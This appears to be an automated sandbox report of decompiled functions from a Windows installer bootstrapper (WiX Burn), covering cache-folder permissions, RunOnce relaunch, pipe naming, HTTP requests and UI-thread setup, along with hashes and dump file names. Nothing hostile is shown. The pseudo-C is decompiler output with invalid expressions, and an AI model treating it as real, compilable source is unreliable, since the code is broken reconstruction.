                                                                                                                                                                  • Failed to secure cache path: %ls, xrefs: 004127C6
                                                                                                                                                                  • Failed to allocate access for Everyone group to path: %ls, xrefs: 0041272C
                                                                                                                                                                  • cache.cpp, xrefs: 0041278E
                                                                                                                                                                  • Failed to allocate access for Users group to path: %ls, xrefs: 0041274D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLocal
                                                                                                                                                                  • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$S#A$cache.cpp
                                                                                                                                                                  • API String ID: 2826327444-747949594
                                                                                                                                                                  • Opcode ID: 27eb83eeea9dd78cbc716efeef0e6c1be78ced3e4a523b80d9b08681d93635e3
                                                                                                                                                                  • Instruction ID: abe8aef90f17b78a688723b5d472dd4331537e2ccbca598f8ba40b9a75fa2e28
                                                                                                                                                                  • Opcode Fuzzy Hash: 27eb83eeea9dd78cbc716efeef0e6c1be78ced3e4a523b80d9b08681d93635e3
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F312832A40325B7EB2196519D45FEF76A8EF44B04F510027BA04FA1C1EAE89D94CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401928, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E00401928(short* _a4, intOrPtr _a8) {
				int _v8;
				char _v12;
				int _v16;
				int _v20;
				short* _t29;
				signed int _t44;
				int _t46;
				void* _t59;
				void* _t60;
				void* _t61;
				signed int _t62;

				_t29 = _a4;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_t60 = 0;
				if(_t29 == 0 ||  *_t29 == 0) {
					L10:
					_t61 = E00431C19( &_v12, 0);
					__eflags = _t61;
					if(_t61 >= 0) {
						__eflags = _v8;
						_t34 =  >  ? _v8 : 0x43b580;
						_t61 = E00431ECE(_t54, _t59, _v8, _v12,  >  ? _v8 : 0x43b580, _a8,  &_v16);
						__eflags = _t61;
						if(_t61 < 0) {
							E00430A57(_t61, "Failed to re-launch bundle process after RunOnce: %ls", _v12);
						}
					} else {
						_push("Failed to get current process path.");
						_push(_t61);
						E00430A57();
					}
					__eflags = _t60;
					if(_t60 != 0) {
						LocalFree(_t60);
					}
					goto L16;
				} else {
					_t54 =  &_v20;
					_t60 = CommandLineToArgvW(_t29,  &_v20);
					if(_t60 != 0) {
						_t62 = 0;
						__eflags = _v20;
						if(_v20 <= 0) {
							goto L10;
						} else {
							goto L5;
						}
						do {
							L5:
							_t54 =  *(_t60 + _t62 * 4);
							_t44 =  *_t54 & 0x0000ffff;
							__eflags = _t44 - 0x2d;
							if(_t44 == 0x2d) {
								L7:
								_t46 = CompareStringW(0x7f, 1,  &(_t54[1]), 0xffffffff, L"burn.runonce", 0xffffffff);
								__eflags = _t46 - 2;
								if(_t46 == 2) {
									goto L9;
								}
								L8:
								E004312A7( &_v8,  *(_t60 + _t62 * 4));
								goto L9;
							}
							__eflags = _t44 - 0x2f;
							if(_t44 != 0x2f) {
								goto L8;
							}
							goto L7;
							L9:
							_t62 = _t62 + 1;
							__eflags = _t62 - _v20;
						} while (_t62 < _v20);
						goto L10;
					} else {
						_t65 =  <=  ? GetLastError() : _t49 & 0x0000ffff | 0x80070000;
						_t61 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t49 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "engine.cpp", 0x20f, _t61);
						_push("Failed to get command line.");
						_push(_t61);
						E00430A57();
						L16:
						if(_v16 != 0) {
							CloseHandle(_v16);
							_v16 = 0;
						}
						if(_v8 != 0) {
							E004380AB(_v8);
						}
						if(_v12 != 0) {
							E004380AB(_v12);
						}
						return _t61;
					}
				}
			}














                                                                                                                                                                  0x0040192e
                                                                                                                                                                  0x00401936
                                                                                                                                                                  0x00401939
                                                                                                                                                                  0x0040193c
                                                                                                                                                                  0x0040193f
                                                                                                                                                                  0x00401942
                                                                                                                                                                  0x00401946
                                                                                                                                                                  0x004019eb
                                                                                                                                                                  0x004019f5
                                                                                                                                                                  0x004019f7
                                                                                                                                                                  0x004019f9
                                                                                                                                                                  0x00401a0a
                                                                                                                                                                  0x00401a19
                                                                                                                                                                  0x00401a26
                                                                                                                                                                  0x00401a28
                                                                                                                                                                  0x00401a2a
                                                                                                                                                                  0x00401a35
                                                                                                                                                                  0x00401a3a
                                                                                                                                                                  0x004019fb
                                                                                                                                                                  0x004019fb
                                                                                                                                                                  0x00401a00
                                                                                                                                                                  0x00401a01
                                                                                                                                                                  0x00401a07
                                                                                                                                                                  0x00401a3d
                                                                                                                                                                  0x00401a3f
                                                                                                                                                                  0x00401a42
                                                                                                                                                                  0x00401a42
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401955
                                                                                                                                                                  0x00401955
                                                                                                                                                                  0x00401960
                                                                                                                                                                  0x00401964
                                                                                                                                                                  0x004019a6
                                                                                                                                                                  0x004019a8
                                                                                                                                                                  0x004019ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004019ad
                                                                                                                                                                  0x004019ad
                                                                                                                                                                  0x004019ad
                                                                                                                                                                  0x004019b0
                                                                                                                                                                  0x004019b3
                                                                                                                                                                  0x004019b6
                                                                                                                                                                  0x004019bd
                                                                                                                                                                  0x004019ce
                                                                                                                                                                  0x004019d4
                                                                                                                                                                  0x004019d7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004019d9
                                                                                                                                                                  0x004019e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004019e0
                                                                                                                                                                  0x004019b8
                                                                                                                                                                  0x004019bb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004019e5
                                                                                                                                                                  0x004019e5
                                                                                                                                                                  0x004019e6
                                                                                                                                                                  0x004019e6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401966
                                                                                                                                                                  0x00401977
                                                                                                                                                                  0x00401981
                                                                                                                                                                  0x0040198f
                                                                                                                                                                  0x00401994
                                                                                                                                                                  0x00401999
                                                                                                                                                                  0x0040199a
                                                                                                                                                                  0x00401a48
                                                                                                                                                                  0x00401a4b
                                                                                                                                                                  0x00401a50
                                                                                                                                                                  0x00401a56
                                                                                                                                                                  0x00401a56
                                                                                                                                                                  0x00401a5c
                                                                                                                                                                  0x00401a61
                                                                                                                                                                  0x00401a61
                                                                                                                                                                  0x00401a69
                                                                                                                                                                  0x00401a6e
                                                                                                                                                                  0x00401a6e
                                                                                                                                                                  0x00401a79
                                                                                                                                                                  0x00401a79
                                                                                                                                                                  0x00401964

                                                                                                                                                                  APIs
                                                                                                                                                                  • CommandLineToArgvW.SHELL32(?,?,?,00000000,00000000,?,?,?,?), ref: 0040195A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00401966
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,burn.runonce,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 004019CE
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00401A42
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00401A50
                                                                                                                                                                  Strings
                                                                                                                                                                  • burn.runonce, xrefs: 004019BF
                                                                                                                                                                  • Failed to get command line., xrefs: 00401994
                                                                                                                                                                  • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00401A2F
                                                                                                                                                                  • Failed to get current process path., xrefs: 004019FB
                                                                                                                                                                  • engine.cpp, xrefs: 0040198A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArgvCloseCommandCompareErrorFreeHandleLastLineLocalString
                                                                                                                                                                  • String ID: Failed to get command line.$Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$burn.runonce$engine.cpp
                                                                                                                                                                  • API String ID: 4103824319-2635325212
                                                                                                                                                                  • Opcode ID: b7bc3b3948e77a6498472a0ea51166648e797aa5d71c3f701bb96127bda0bb63
                                                                                                                                                                  • Instruction ID: ac4432f8ad99de101b227787c47cc2601316c3d3ba50688ad5e75ee1d638d7f5
                                                                                                                                                                  • Opcode Fuzzy Hash: b7bc3b3948e77a6498472a0ea51166648e797aa5d71c3f701bb96127bda0bb63
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A41A072D00225FBCB11ABD59C85AAFB7B4EF08714F10117BFA11B62A0D7398A40CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F1D5, Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 0040F208
                                                                                                                                                                  • StringFromGUID2.OLE32(?,0041652F,00000027), ref: 0040F225
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFromStringUuid
                                                                                                                                                                  • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                                                                  • API String ID: 4041566446-2510341293
                                                                                                                                                                  • Opcode ID: 209c95779dc1d3cb754cb6fedfdc42c0beb6dae34183ea6a75561af27e831c09
                                                                                                                                                                  • Instruction ID: 04bc8a957c85bcd3b80e0c97f4dcf9d6187b76c6f5d11b35648650f0b2c3489e
                                                                                                                                                                  • Opcode Fuzzy Hash: 209c95779dc1d3cb754cb6fedfdc42c0beb6dae34183ea6a75561af27e831c09
                                                                                                                                                                  • Instruction Fuzzy Hash: D6418E76D00308ABDB20DBE5CD45B9EB7B8AB48714F60013FF905FB280D6799909CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004257C9, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 114networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                                  			E004257C9(void* __ecx, void* _a4, WCHAR* _a8, void* _a12, intOrPtr _a16, intOrPtr* _a20, WCHAR* _a24, void** _a28) {
				WCHAR* _v8;
				intOrPtr* _t17;
				WCHAR* _t19;
				long _t45;
				void* _t46;
				void* _t49;

				_t38 = __ecx;
				_push(__ecx);
				_t45 =  ==  ? 0x84c00200 : 0x84400200;
				_v8 = 0;
				_t49 = E00433F88( &_v8, _a16, 0);
				if(_t49 >= 0) {
					_t17 = _a20;
					if(_t17 == 0 ||  *_t17 == 0) {
						L7:
						_t46 = HttpOpenRequestW(_a4, _a8, _v8, 0, 0, 0x456078, _t45, 0);
						if(_t46 != 0) {
							_t19 = _a24;
							if(_t19 == 0 ||  *_t19 == 0 || HttpAddRequestHeadersW(_t46, _t19, 0xffffffff, 0x40000000) != 0) {
								 *_a28 = _t46;
								_t46 = 0;
							} else {
								_t53 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
								_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
								E004300D9(0x80004005, "downloadengine.cpp", 0x25c, _t49);
								_push("Failed to add header to HTTP request.");
								_push(_t49);
								E00430A57();
							}
							if(_t46 != 0) {
								InternetCloseHandle(_t46);
							}
							goto L16;
						}
						_t56 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
						_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "downloadengine.cpp", 0x256, _t49);
						_push("Failed to open internet request.");
						goto L2;
					} else {
						_t49 = E00433C35(_t38,  &_v8, _t17, 0);
						if(_t49 >= 0) {
							goto L7;
						}
						_push("Failed to append query strong to resource from URI.");
						L2:
						_push(_t49);
						E00430A57();
						L16:
						if(_v8 != 0) {
							E004380AB(_v8);
						}
						return _t49;
					}
				}
				_push("Failed to allocate string for resource URI.");
				goto L2;
			}









                                                                                                                                                                  0x004257c9
                                                                                                                                                                  0x004257cc
                                                                                                                                                                  0x004257e4
                                                                                                                                                                  0x004257eb
                                                                                                                                                                  0x004257f3
                                                                                                                                                                  0x004257f7
                                                                                                                                                                  0x0042580b
                                                                                                                                                                  0x00425810
                                                                                                                                                                  0x0042582f
                                                                                                                                                                  0x00425847
                                                                                                                                                                  0x0042584b
                                                                                                                                                                  0x00425885
                                                                                                                                                                  0x0042588a
                                                                                                                                                                  0x004258e4
                                                                                                                                                                  0x004258e6
                                                                                                                                                                  0x004258a4
                                                                                                                                                                  0x004258b5
                                                                                                                                                                  0x004258bf
                                                                                                                                                                  0x004258cd
                                                                                                                                                                  0x004258d2
                                                                                                                                                                  0x004258d7
                                                                                                                                                                  0x004258d8
                                                                                                                                                                  0x004258de
                                                                                                                                                                  0x004258ea
                                                                                                                                                                  0x004258ed
                                                                                                                                                                  0x004258ed
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004258ea
                                                                                                                                                                  0x0042585e
                                                                                                                                                                  0x00425868
                                                                                                                                                                  0x00425876
                                                                                                                                                                  0x0042587b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425817
                                                                                                                                                                  0x00425822
                                                                                                                                                                  0x00425826
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425828
                                                                                                                                                                  0x004257fe
                                                                                                                                                                  0x004257fe
                                                                                                                                                                  0x004257ff
                                                                                                                                                                  0x004258f3
                                                                                                                                                                  0x004258f6
                                                                                                                                                                  0x004258fb
                                                                                                                                                                  0x004258fb
                                                                                                                                                                  0x00425906
                                                                                                                                                                  0x00425906
                                                                                                                                                                  0x00425810
                                                                                                                                                                  0x004257f9
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00456078,84400200,00000000), ref: 00425841
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0042584D
                                                                                                                                                                  • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,40000000), ref: 0042589A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004258A4
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004258ED
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add header to HTTP request., xrefs: 004258D2
                                                                                                                                                                  • Failed to open internet request., xrefs: 0042587B
                                                                                                                                                                  • Failed to allocate string for resource URI., xrefs: 004257F9
                                                                                                                                                                  • Failed to append query strong to resource from URI., xrefs: 00425828
                                                                                                                                                                  • downloadengine.cpp, xrefs: 00425871, 004258C8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpLastRequest$CloseHandleHeadersInternetOpen
                                                                                                                                                                  • String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$downloadengine.cpp
                                                                                                                                                                  • API String ID: 3883690129-2273796897
                                                                                                                                                                  • Opcode ID: 13b9d01963729b7df5074c24dac6088f8320938f88ce92457662e6e81cf82dd0
                                                                                                                                                                  • Instruction ID: 6c27ab35ae45a4613ff69e05f14ba45a178f1030a5c05abe825c23cd54fdf4d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 13b9d01963729b7df5074c24dac6088f8320938f88ce92457662e6e81cf82dd0
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E310A32B00725BBEB11AA65AC45B6B76E8EF44751F51012BFD01F7290DBB8CC1096EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402986, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00402986(void* __edx, intOrPtr _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				short* _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t44;
				void* _t45;
				signed int _t50;

				_t16 =  *0x4560d0; // 0xae480e18
				_v8 = _t16 ^ _t50;
				_v32 = _a8;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v28 = 0;
				GetSystemTime( &_v24);
				_t44 = GetDateFormatW(0x400, 1,  &_v24, 0, 0, 0);
				if(_t44 != 0) {
					L3:
					_t45 = E00433BDF( &_v28, _t44);
					if(_t45 >= 0) {
						if(GetDateFormatW(0x400, 1,  &_v24, 0, _v28, _t44) != 0) {
							L8:
							_t45 = E00418DBD(_t44, _v32, _v28, _t44);
							if(_t45 < 0) {
								_push("Failed to set variant value.");
								goto L10;
							}
						} else {
							_t45 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
							if(_t45 >= 0) {
								goto L8;
							} else {
								E004300D9(_t32, "variable.cpp", 0x795, _t45);
								_push("Failed to get the Date.");
								goto L10;
							}
						}
					} else {
						_push("Failed to allocate the buffer for the Date.");
						goto L10;
					}
				} else {
					_t45 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
					if(_t45 >= 0) {
						goto L3;
					} else {
						E004300D9(_t34, "variable.cpp", 0x78d, _t45);
						_push("Failed to get the required buffer length for the Date.");
						L10:
						_push(_t45);
						E00430A57();
					}
				}
				if(_v28 != 0) {
					E004380AB(_v28);
				}
				return L004267AF(_t45, _v8 ^ _t50, _t44, _t45);
			}













                                                                                                                                                                  0x0040298c
                                                                                                                                                                  0x00402993
                                                                                                                                                                  0x0040299a
                                                                                                                                                                  0x004029a4
                                                                                                                                                                  0x004029a5
                                                                                                                                                                  0x004029a6
                                                                                                                                                                  0x004029a7
                                                                                                                                                                  0x004029ae
                                                                                                                                                                  0x004029b1
                                                                                                                                                                  0x004029d1
                                                                                                                                                                  0x004029d5
                                                                                                                                                                  0x00402a02
                                                                                                                                                                  0x00402a0c
                                                                                                                                                                  0x00402a10
                                                                                                                                                                  0x00402a32
                                                                                                                                                                  0x00402a5f
                                                                                                                                                                  0x00402a6b
                                                                                                                                                                  0x00402a6f
                                                                                                                                                                  0x00402a71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402a71
                                                                                                                                                                  0x00402a34
                                                                                                                                                                  0x00402a41
                                                                                                                                                                  0x00402a46
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402a48
                                                                                                                                                                  0x00402a53
                                                                                                                                                                  0x00402a58
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402a58
                                                                                                                                                                  0x00402a46
                                                                                                                                                                  0x00402a12
                                                                                                                                                                  0x00402a12
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402a12
                                                                                                                                                                  0x004029d7
                                                                                                                                                                  0x004029e4
                                                                                                                                                                  0x004029e9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004029eb
                                                                                                                                                                  0x004029f6
                                                                                                                                                                  0x004029fb
                                                                                                                                                                  0x00402a76
                                                                                                                                                                  0x00402a76
                                                                                                                                                                  0x00402a77
                                                                                                                                                                  0x00402a7d
                                                                                                                                                                  0x004029e9
                                                                                                                                                                  0x00402a82
                                                                                                                                                                  0x00402a87
                                                                                                                                                                  0x00402a87
                                                                                                                                                                  0x00402a9c

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 004029B1
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 004029C5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004029D7
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 00402A2A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402A34
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00402A71
                                                                                                                                                                  • Failed to allocate the buffer for the Date., xrefs: 00402A12
                                                                                                                                                                  • Failed to get the required buffer length for the Date., xrefs: 004029FB
                                                                                                                                                                  • variable.cpp, xrefs: 004029F1, 00402A4E
                                                                                                                                                                  • Failed to get the Date., xrefs: 00402A58
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DateErrorFormatLast$SystemTime
                                                                                                                                                                  • String ID: Failed to allocate the buffer for the Date.$Failed to get the Date.$Failed to get the required buffer length for the Date.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2700948981-3682088697
                                                                                                                                                                  • Opcode ID: d31839f4db480afc26cdf24a4051a66e8e4109e136620ff77ae6ea42b9d69ad2
                                                                                                                                                                  • Instruction ID: 93710acde06ff9ffe3ac996955c843d84e7064965b1b938c973326945c93e24f
                                                                                                                                                                  • Opcode Fuzzy Hash: d31839f4db480afc26cdf24a4051a66e8e4109e136620ff77ae6ea42b9d69ad2
                                                                                                                                                                  • Instruction Fuzzy Hash: ED31DC31F407266ADB21AAA59D46FBFB6B8DB48754F110137FA00F61D0DA789C014AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041787A, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                  			E0041787A(intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void _v24;
				void* _t21;
				void* _t24;
				void* _t28;
				intOrPtr _t43;
				int _t45;

				asm("stosd");
				asm("stosd");
				_t45 = 0;
				_v12 = 0;
				_v8 = 0;
				asm("stosd");
				_t21 = CreateEventW(0, 1, 0, 0);
				_v12 = _t21;
				if(_t21 != 0) {
					_t43 = _a8;
					_v24 = _t21;
					_v20 = _a4;
					_v16 = _t43;
					_t24 = CreateThread(0, 0, E004175BE,  &_v24, 0, 0);
					_v8 = _t24;
					if(_t24 != 0) {
						WaitForMultipleObjects(2,  &_v12, 0, 0xffffffff);
						 *((intOrPtr*)(_t43 + 0x3ac)) = _v8;
						_t28 = 0;
						_v8 = 0;
					} else {
						_t48 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "uithread.cpp", 0x47, _t45);
						_push("Failed to create the UI thread.");
						goto L4;
					}
				} else {
					_t51 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					_t45 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "uithread.cpp", 0x3e, _t45);
					_push("Failed to create initialization event.");
					L4:
					_push(_t45);
					E00430A57();
					_t28 = _v8;
				}
				if(_t28 != 0) {
					CloseHandle(_t28);
					_v8 = 0;
				}
				if(_v12 != 0) {
					CloseHandle(_v12);
				}
				return _t45;
			}













                                                                                                                                                                  0x0041788a
                                                                                                                                                                  0x0041788d
                                                                                                                                                                  0x00417891
                                                                                                                                                                  0x00417893
                                                                                                                                                                  0x00417896
                                                                                                                                                                  0x00417899
                                                                                                                                                                  0x0041789a
                                                                                                                                                                  0x004178a0
                                                                                                                                                                  0x004178a5
                                                                                                                                                                  0x004178d9
                                                                                                                                                                  0x004178dd
                                                                                                                                                                  0x004178e4
                                                                                                                                                                  0x004178f2
                                                                                                                                                                  0x004178f5
                                                                                                                                                                  0x004178fb
                                                                                                                                                                  0x00417900
                                                                                                                                                                  0x00417948
                                                                                                                                                                  0x00417951
                                                                                                                                                                  0x00417957
                                                                                                                                                                  0x00417959
                                                                                                                                                                  0x00417902
                                                                                                                                                                  0x00417913
                                                                                                                                                                  0x0041791d
                                                                                                                                                                  0x00417928
                                                                                                                                                                  0x0041792d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041792d
                                                                                                                                                                  0x004178a7
                                                                                                                                                                  0x004178b8
                                                                                                                                                                  0x004178c2
                                                                                                                                                                  0x004178cd
                                                                                                                                                                  0x004178d2
                                                                                                                                                                  0x00417932
                                                                                                                                                                  0x00417932
                                                                                                                                                                  0x00417933
                                                                                                                                                                  0x00417938
                                                                                                                                                                  0x0041793c
                                                                                                                                                                  0x00417964
                                                                                                                                                                  0x00417967
                                                                                                                                                                  0x00417969
                                                                                                                                                                  0x00417969
                                                                                                                                                                  0x0041796f
                                                                                                                                                                  0x00417974
                                                                                                                                                                  0x00417974
                                                                                                                                                                  0x0041797c

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,00401EA4,?,?), ref: 0041789A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004178A7
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 004178F5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417902
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FF), ref: 00417948
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417967
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417974
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
